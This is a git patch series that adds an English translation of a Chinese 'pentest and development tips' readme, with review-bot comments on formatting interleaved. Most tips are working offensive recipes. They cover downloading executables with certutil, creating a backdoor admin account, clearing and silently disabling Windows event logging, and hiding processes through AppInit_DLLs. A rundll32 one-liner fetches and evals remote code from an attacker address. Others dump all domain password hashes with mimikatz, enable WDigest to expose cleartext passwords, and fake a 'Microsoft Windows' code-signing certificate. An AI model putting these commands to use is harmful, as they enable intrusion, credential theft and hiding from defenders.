From c754c2b7ac9e46f83d7f934213c4285a345d196c Mon Sep 17 00:00:00 2001 From: vaginessa Date: Sat, 9 Dec 2017 16:49:55 +0100 Subject: [PATCH 1/6] add english translation (google-translate) --- readme-eng.md | 210 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 210 insertions(+) create mode 100644 readme-eng.md diff --git a/readme-eng.md b/readme-eng.md new file mode 100644 index 0000000..7bcd502 --- /dev/null +++ b/readme-eng.md 
@@ -0,0 +1,210 @@ +# Pentest-and-Development-Tips +A collection of pentest and development tips + +Author: 3gstudent + +### statement + +The following tips should not be used for illegal purposes + +--- + +### Tips 1. Manual port detection + +The -sV nmap can detect the service version, but in some cases you must manually probe to verify + +Use Wireshark response package is overkill, nc simple judgment + +eg + +For port 8001, nc connected up, just enter a string, get the following result: + +`` ` +$ nc -vv localhost 8001 +localhost [127.0.0.1] 8001 (?) open +asd +HTTP / 1.1 400 Bad Request +Date: Fri, 25 Aug 2017 12:15:25 GMT +Server: Apache / 2.4.23 (Debian) +Content-Length: 301 +Connection: close +Content-Type: text / html; charset = iso-8859-1 + + + 400 Bad Request </ title> +</ head> <body> +<h1> Bad Request </ h1> +<p> Your browser sent a request that this server could not understand. <br /> +</ p> +<hr> +<address> Apache / 2.4.23 (Debian) Server at 127.0.0.1 Port 8001 </ address> +</ body> </ html> +`` ` + +From this we know that this is an http service because the string we sent was not a valid HTTP request, so we returned a 400 Bad requests, and we also got the system version of Debian, WebServer is Apache + +Reference: + +["Talk about port exploration experience and principles"] (http://www.freebuf.com/articles/network/146087.html) + + +--- + +### Tips 2. Windows system to download files from Kali + +Kali: + +`` ` +python -m SimpleHTTPServer 80 +`` ` + +Windows: + +`` ` +certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe +certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete +`` ` +Reference: + +["Certutil.exe in penetration test"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF % 95% E4% B8% AD% E7% 9A% 84certutil.exe /) + +--- + +### Tips 3. 
Configure the workgroup computer to support net use remote connections + +Add user: + +`` ` +net user test test / add +net localgroup administrators test / add +`` ` + +Modify the registry to support remote connections: + +`` ` +reg add hklm \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ System / v LocalAccountTokenFilterPolicy / t REG_DWORD / d 1 +`` ` + +net use remote connection: + +`` ` +net use \\ 192.168.1.195 test / u: test +`` ` + +--- + +### Tips 4. Windows log clear + +Get log classification list: + +`` ` +wevtutil el> 1.txt +`` ` + +Get statistics for a single log category: + +eg + +`` ` +wevtutil gli "windows powershell" +`` ` + +echo: + +`` ` +creationTime: 2016-11-28T06: 01: 37.986Z +lastAccessTime: 2016-11-28T06: 01: 37.986Z +lastWriteTime: 2017-08-08T08: 01: 20.979Z +fileSize: 1118208 +attributes: 32 +numberOfLogRecords: 1228 +oldestRecordNumber: 1 +`` ` + +View the specific content of the specified log: + +`` ` +wevtutil qe / f: text "windows powershell" +`` ` + +Delete all information for a single log category: + +`` ` +wevtutil cl "windows powershell" +`` ` + +Reference: + +["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /) + +--- + +### Tips 5. 
Destroy Windows log records + +By calling TerminateThread to achieve the log function of the thread, making the logging failure, but the Windows Event Log service is not damaged, the state is still running + +Powershell: + +https://github.com/hlldz/Invoke-Phant0m + +C ++: + +https://github.com/3gstudent/Windwos-EventLog-Bypass + +Reference: + +["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /) + +["Bypassing Windwos Log Monitoring with API-NtQueryInformationThread and I_QueryTagInformation"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread% E5% 92% 8CI_QueryTagInformation% E5% AE% 9E% E7% 8E% B0% E5% AF% B9Windwos% E6% 97% A5% E5% BF% 97% E7% 9B% 91% E6% 8E% A7% E7% 9A% 84% E7% BB% 95% E8% BF% 87 /) + + +--- + +### Tips 6. The processes under Win7 and Windows Server 2008 R2 are hidden + +Use globalAPIhooks, by modifying the registry + +Download Project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz + +Modify the code to specify the hidden program name cldr.exe, compiled into cldr.dll, cldr.dll on `C: \ ProgramData \ Microsoft \ HelpLibrary \` + +Administrator rights: + +`` ` +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0 +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f +`` ` + +At this point, cldr.exe does not exist in the Task Manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe + +For 64-bit systems: + +Administrator rights: + +`` 
` +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0 +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldrx64.dll" / f +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0 +reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f +reg add "hklm \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f +`` ` + +Reference: + +["Using globalAPIhooks to hide processes under Win7"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7% B3% BB% E7% BB% 9F% E4% B8% 8B% E9% 9A% 90% E8% 97% 8F% E8% BF% 9B% E7% A8% 8B /) + +--- + +### Tips 7. exe and com file of the same name the order of execution + +If a path contains both exe and com files of the same name, for example, test.exe and test.com, enter test (without the file extension) via the command line cmd, giving priority to the com file, test.com + +The COM file generated only need to exe file extension to com can be + +Reference: + +"A dirty way of tricking users to bypass UAC" + +--- From 671116e0943e9fcacc423e61b1d3719df2580b5b Mon Sep 17 00:00:00 2001 From: vaginessa <vaginessa@users.noreply.github.com> Date: Sat, 9 Dec 2017 16:55:07 +0100 Subject: [PATCH 2/6] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7ad1f38..deeb5f0 100644 --- a/README.md +++ b/README.md 
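Review bot: every fenced code block in the new readme-eng.md is written as "`` `" (two backticks, a space, one backtick) instead of "```", so none of them renders as code in Markdown, and the same machine translation has inserted spaces into command syntax, e.g. "net user test test / add", "reg add hklm \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ System / v LocalAccountTokenFilterPolicy / t REG_DWORD / d 1" and "HTTP / 1.1 400 Bad Request", so the commands in Tips 2 to 6 will not run as pasted and the captured nc output in Tips 1 no longer matches what the server actually sends. The reference links are broken as well: "] (" has a space between the link text and the URL, and the percent-encoded paths contain spaces ("% 95% E4% B8%"). In the Tips 6 64-bit block the fourth and fifth reg add lines repeat the first two verbatim, and the RequireSignedAppInit_DLLs lines are the only ones without "/ f", so reg add will stop to prompt for confirmation whenever the value already exists. Suggest regenerating the file from the Chinese README with code blocks, captured output and URLs copied verbatim and only the surrounding prose translated.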
@@ -2,7 +2,7 @@ A collection of pentest and development tips Author: 3gstudent - +[English Version](readme-eng.md) ### 声明 以下技巧不应用于非法用途 From f729c1d83863b3e50fc8b739df69148d86f4b816 Mon Sep 17 00:00:00 2001 From: vaginessa <vaginessa@users.noreply.github.com> Date: Sat, 9 Dec 2017 16:56:21 +0100 Subject: [PATCH 3/6] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index deeb5f0..07d13b2 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,9 @@ A collection of pentest and development tips Author: 3gstudent + [English Version](readme-eng.md) + ### 声明 以下技巧不应用于非法用途 From 61f1c2b0f0d18d8d294dfb1ed447207e6ee5fed1 Mon Sep 17 00:00:00 2001 From: Pratik raj <rajpratik71@gmail.com> Date: Sat, 29 Dec 2018 03:06:25 +0530 Subject: [PATCH 4/6] Full en-US Translation --- readme-eng.md | 1955 ++++++++++++++++++++++++++++++++++++++++++++++--- 1 file changed, 1856 insertions(+), 99 deletions(-) diff --git a/readme-eng.md b/readme-eng.md index 7bcd502..56ced74 100644 --- a/readme-eng.md +++ b/readme-eng.md @@ -1,7 +1,7 @@ # Pentest-and-Development-Tips A collection of pentest and development tips -Author: 3gstudent +Author: 3gstudent ### statement 
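Review bot: the blank line after "Author: 3gstudent" is removed here (the "-" line is the empty separator) so "[English Version](readme-eng.md)" lands directly beneath the author line with no paragraph break; PATCH 3/6 exists only to restore that spacing, so the two commits should be squashed into one.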
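Review bot: the PATCH 3/6 hunk is a whitespace-only follow-up to PATCH 2/6 (blank lines added around the "[English Version](readme-eng.md)" link); fold it into the previous commit rather than shipping a second "Update README.md" change, and give the combined commit a message that states what it does, for example "Link to English translation from README".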
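Review bot: the only change in the PATCH 4/6 "@@ -1,7 +1,7 @@" hunk is trailing whitespace appended to "Author: 3gstudent"; drop this hunk (or strip the trailing space) so the diff records only the translation changes.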
@@ -11,200 +11,1957 @@ The following tips should not be used for illegal purposes ### Tips 1. Manual port detection -The -sV nmap can detect the service version, but in some cases you must manually probe to verify +Nmap's -sV can detect the service version, but in some cases it must be manually detected to verify -Use Wireshark response package is overkill, nc simple judgment +Using Wireshark to get a response packet is inevitable and can be easily judged by nc. -eg +Eg. -For port 8001, nc connected up, just enter a string, get the following result: +For port 8001, nc is connected, just enter a string and get the following result: -`` ` +``` $ nc -vv localhost 8001 -localhost [127.0.0.1] 8001 (?) open -asd -HTTP / 1.1 400 Bad Request +Localhost [127.0.0.1] 8001 (?) open +Asd +HTTP/1.1 400 Bad Request Date: Fri, 25 Aug 2017 12:15:25 GMT -Server: Apache / 2.4.23 (Debian) +Server: Apache/2.4.23 (Debian) Content-Length: 301 Connection: close -Content-Type: text / html; charset = iso-8859-1 -<! DOCTYPE HTML PUBLIC "- // IETF // DTD HTML 2.0 // EN"> -<html> <head> -<title> 400 Bad Request </ title> -</ head> <body> -<h1> Bad Request </ h1> -<p> Your browser sent a request that this server could not understand. <br /> -</ p> +Content-Type: text/html; charset=iso-8859-1 +<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> +<html><head> +<title>400 Bad Request + +

Bad Request

+

Your browser sent a request that this server could not understand.


-
Apache / 2.4.23 (Debian) Server at 127.0.0.1 Port 8001 - -`` ` +
Apache/2.4.23 (Debian) Server at 127.0.0.1 Port 8001
+ +``` -From this we know that this is an http service because the string we sent was not a valid HTTP request, so we returned a 400 Bad requests, and we also got the system version of Debian, WebServer is Apache +From this we know that this is an http service, because the string we sent is not a valid HTTP request, so we return a 400 Bad requests, we also get the system version is Debian, WebServer is Apache Reference: -["Talk about port exploration experience and principles"] (http://www.freebuf.com/articles/network/146087.html) +["Talk about the experience and principles of port detection"] (http://www.freebuf.com/articles/network/146087.html) --- -### Tips 2. Windows system to download files from Kali +### Tips 2. Windows system downloads files from Kali Kali: -`` ` -python -m SimpleHTTPServer 80 -`` ` +``` +Python -m SimpleHTTPServer 80 +``` Windows: -`` ` -certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe -certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete -`` ` +``` +Certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe +Certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete +``` Reference: -["Certutil.exe in penetration test"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF % 95% E4% B8% AD% E7% 9A% 84certutil.exe /) +["certutil.exe in penetration test"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF %95%E4%B8%AD%E7%9A%84certutil.exe/) --- - -### Tips 3. Configure the workgroup computer to support net use remote connections +### Tips 3. 
Configure the workgroup computer to support net use remote connection Add user: -`` ` -net user test test / add -net localgroup administrators test / add -`` ` +``` +Net user test test /add +Net localgroup administrators test /add +``` Modify the registry to support remote connections: -`` ` -reg add hklm \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ System / v LocalAccountTokenFilterPolicy / t REG_DWORD / d 1 -`` ` +``` +Reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 +``` -net use remote connection: +Net use remote connection: -`` ` -net use \\ 192.168.1.195 test / u: test -`` ` +``` +Net use \\192.168.1.195 test /u:test +``` --- -### Tips 4. Windows log clear +### Tips 4. Windows evtx log cleanup -Get log classification list: +Get a list of evtx log categories: -`` ` -wevtutil el> 1.txt -`` ` +``` +Wevtutil el >1.txt +``` -Get statistics for a single log category: +Get statistics for a single evtx log category: -eg +Eg. 
-`` ` -wevtutil gli "windows powershell" -`` ` +``` +Wevtutil gli "windows powershell" +``` echo: -`` ` -creationTime: 2016-11-28T06: 01: 37.986Z -lastAccessTime: 2016-11-28T06: 01: 37.986Z -lastWriteTime: 2017-08-08T08: 01: 20.979Z +``` +creationTime: 2016-11-28T06:01:37.986Z +lastAccessTime: 2016-11-28T06:01:37.986Z +lastWriteTime: 2017-08-08T08:01:20.979Z fileSize: 1118208 -attributes: 32 +Attributes: 32 numberOfLogRecords: 1228 oldestRecordNumber: 1 -`` ` +``` + +View the specific content of the specified evtx log: -View the specific content of the specified log: +``` +Wevtutil qe /f:text "windows powershell" +``` -`` ` -wevtutil qe / f: text "windows powershell" -`` ` +Find the specified amount of log content: -Delete all information for a single log category: +``` +Wevtutil qe /f:text "windows powershell" /c:20 +``` +Delete all information for a single evtx log category: -`` ` -wevtutil cl "windows powershell" -`` ` +``` +Wevtutil cl "windows powershell" +``` Reference: -["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /) +["Infiltration Techniques - Deleting and Bypassing Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95% E8%BF%87/) + +Single evtx log cleanup: + +[Details soon] --- -### Tips 5. Destroy Windows log records +### Tips 5. Destroy Windows logging -By calling TerminateThread to achieve the log function of the thread, making the logging failure, but the Windows Event Log service is not damaged, the state is still running +The thread that implements the logging function is terminated by calling TerminateThread, which disables the logging function, but the Windows Event Log service is not destroyed and the state is still running. 
Powershell: https://github.com/hlldz/Invoke-Phant0m -C ++: +C++: https://github.com/3gstudent/Windwos-EventLog-Bypass Reference: -["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /) +["Infiltration Techniques - Deleting and Bypassing Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95% E8%BF%87/) -["Bypassing Windwos Log Monitoring with API-NtQueryInformationThread and I_QueryTagInformation"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread% E5% 92% 8CI_QueryTagInformation% E5% AE% 9E% E7% 8E% B0% E5% AF% B9Windwos% E6% 97% A5% E5% BF% 97% E7% 9B% 91% E6% 8E% A7% E7% 9A% 84% E7% BB% 95% E8% BF% 87 /) +["Using API-NtQueryInformationThread and I_QueryTagInformation to achieve bypass of Windwos log monitoring"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread% E5%92%8CI_QueryTagInformation%E5%AE%9E%E7%8E%B0%E5%AF%B9Windwos%E6%97%A5%E5%BF%97%E7%9B%91%E6%8E%A7%E7% 9A%84%E7%BB%95%E8%BF%87/) --- -### Tips 6. The processes under Win7 and Windows Server 2008 R2 are hidden +### Tips 6. 
Process hiding under Win7 and Windows Server 2008 R2 -Use globalAPIhooks, by modifying the registry +Use globalAPIhooks to modify the registry -Download Project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz +Download project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz -Modify the code to specify the hidden program name cldr.exe, compiled into cldr.dll, cldr.dll on `C: \ ProgramData \ Microsoft \ HelpLibrary \` +Modify the code to specify the program name cldr.exe to be hidden, compile into cldr.dll, cldr.dll in `C:\ProgramData\Microsoft\HelpLibrary\` -Administrator rights: +Administrator privileges: -`` ` -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0 -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f -`` ` +``` +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f +``` -At this point, cldr.exe does not exist in the Task Manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe +At this time, cldr.exe does not exist in the task manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe. 
For 64-bit systems: -Administrator rights: +Administrator privileges: + +``` +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /f +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 +Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f +Reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f +``` + +Reference: + +["Using globalAPIhooks to hide processes under Win7 system"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7% B3%BB%E7%BB%9F%E4%B8%8B%E9%9A%90%E8%97%8F%E8%BF%9B%E7%A8%8B/) -`` ` -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0 -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldrx64.dll" / f -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0 -reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f -reg add "hklm \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f -`` ` +--- + +### Tips 7. 
The same name exe and com file execution order + +If a path contains both exe and com files with the same name, such as test.exe and test.com, enter test (without the file suffix) through the command line cmd, and the com file will be run first, ie test.com + +The generation of COM files only needs to change the suffix name of the exe file to com. Reference: -["Using globalAPIhooks to hide processes under Win7"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7% B3% BB% E7% BB% 9F% E4% B8% 8B% E9% 9A% 90% E8% 97% 8F% E8% BF% 9B% E7% A8% 8B /) +"A dirty way of tricking users to bypass UAC" --- -### Tips 7. exe and com file of the same name the order of execution +### Tips 8. Windows system certificate generation and registration + +Certificate generation and signature: + +``` +makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer +cert2spc Root.cer Root.spc +pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f +signtool sign /f Root.pfx /p 12345678password test.exe +``` + +After execution, four files Root.cer, Root.pfx, Root.pvk, and Root.spc are generated, and test.exe is digitally signed. -If a path contains both exe and com files of the same name, for example, test.exe and test.com, enter test (without the file extension) via the command line cmd, giving priority to the com file, test.com +Certificate registration: -The COM file generated only need to exe file extension to com can be +Admin permission cmd, add the certificate to localmachine: + +``` +Certmgr.exe -add -c Root.cer -s -r localmachine root +``` Reference: "A dirty way of tricking users to bypass UAC" --- + +### Tips 9. hta execute vbs, load powershell + +Test.hta: + +``` + + + + + + + +``` +Reference: + +Bypass McAfee Application Control - Code Execution + +--- + +### Tips 10. 
Write dll by c# and load dll via rundll32.exe or regsvr32 + +By default, c# cannot declare exported functions, but can be implemented by adding UnmanagedExports + +Of course, dlls written by c# need to be run in the corresponding version of the .NET environment. The dlls written in C++ are more general. + +The dll can be loaded by rundll32.exe or regsvr32, but the dll is required to contain a specific export function. + +Reference: + +Code Execution of Regsvr32.exe + +--- + +### Tips 11. Introduction to cpl file under Windows + +Essentially a DLL file with a suffix of cpl and an export function CPLApplet (c can be specified) + +Implementation method: + +(1) Double click to run directly + +(2) cmd + +``` +Rundll32 shell32.dll, Control_RunDLL test.cpl +``` + +(3) cmd + +``` +Control test.cpl +``` + +(4)vbs + +``` +Dim obj +Set obj = CreateObject("Shell.Application") +obj.ControlPanelItem("test.cpl") +``` + +(5)js + +``` +Var a = new ActiveXObject("Shell.Application"); +a.ControlPanelItem("c:\\test\\test.cpl"); +``` + +reference: + +"Introduction to the use of CPL documents" + +--- + +### Tips 12. Windows calls rundll32 via cmd to execute a piece of code to bounce back to the shell. + +Server: + +https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1 + +Client: + +``` +Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try {v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split("; ")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send (); B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true );} +``` + +Of course, the RAT tool can also be loaded by: + +Vbs,js,exe,dll,shellcode + +reference: + +JavaScript Backdoor + +JavaScript Phishing + +--- + +### Tips 13. 
The key of putty&pageant can be restored by memory dump + +Both windows and Linux apply + +reference: + +Memory Dump Utilization Example + +--- + +### Tips 14. Fishing for Visual Studio + +Visual C++: +- Modify the .vcxproj file + +Visual Basic: +- Modify the .vbproj file + +Visual F#: +- Modify the .fsproj file + +Ability to execute arbitrary code when compiling for any of the above projects using Visual Studio + +reference: + +"Pay close attention to your download code - Visual Studio trick to run code when building" + +--- + +### Tips 15. When a 32-bit program is executed under a 64-bit Windows system, there is a redirect if there is an operation on the registry and files. + +For registry operations: + +The actual path to access HKLM\Software\ is HKLM\Software\Wow6432Node\ + +For file operations: + +Visit c:\windows\Sysnative\ 的实际路径为 c:\windows\system32\ +The actual path to access c:\windows\system32\ is c:\windows\SysWOW64\ + +reference: + +"Redirection issues to be aware of when running 32-bit programs on 64-bit systems" + +--- + +### Tips 16. Get Windows domain control all user hash + +#### method 1: + +Copy ntds.dit: + +Use NinjaCopy, https://github.com/3gstudent/NinjaCopy + +Export hash: + +Use quarkspwdump, https://github.com/quarkslab/quarkspwdump + +``` +Esentutl /p /o ntds.dit +QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt +``` + +#### Method 2: + +Use powershell: DSInternals PowerShell Module + +https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip + +Applicable conditions: + +Windows PowerShell 3.0 or 3.0+ + +.NET Framework 4.0 or 4.0+ + +reference: + +"Exporting the technical finishing of all user hashes in the current domain" + +"Using Powershell to quickly export domain control all user hashes" + +#### Method 3: + +Mimikatz: + +``` +Mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit" +``` + +--- + +### Tips 17. 
Export Windows system clear text password + +Windows Server 2012 cannot use mimikatz to export plaintext passwords by default, as are some Windows Server 2008. + +Workaround: Enable Wdigest Auth + +Cmd: + +``` +Reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f +``` + +Or + +Powershell: + +``` +Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1 +``` + +Restart or user login again, can export clear text password + +reference: + +Domain Infiltration - Dump Clear-Text Password after KB2871997 installed + +--- + +### Tips 18. The new password of the domain controller can be recorded in real time through Hook PasswordChangeNotify. + +Of course, you can choose to save locally or upload your password to the server. + +reference: + +Domain Infiltration - Hook PasswordChangeNotify + +--- + +### Tips 19. Remember to pay attention to the local administrator account of the host in the domain when the domain is infiltrated. + +If the administrator neglects that the hosts in the domain use the same local administrator account, you can remotely log in to other hosts in the domain through pass-the-hash. + +reference: + +Domain Penetration - Local Administrator Password Solution + +--- + +### Tips 20. Get the dll export function through powershell + +https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1 + +``` +Get-Exports -DllPath c:\Windows\system32\dimsjob.dll -ExportsToCpp C:\test\export.txt +``` + +reference: + +[Study Notes Weekly No.3 (Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-Weekly-No. 3 (Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger)/) + +--- + +### Tips 21. Parameter hiding tips for shortcuts + +Put the payload after 260 null characters, so you can't view the payload in the file attribute. 
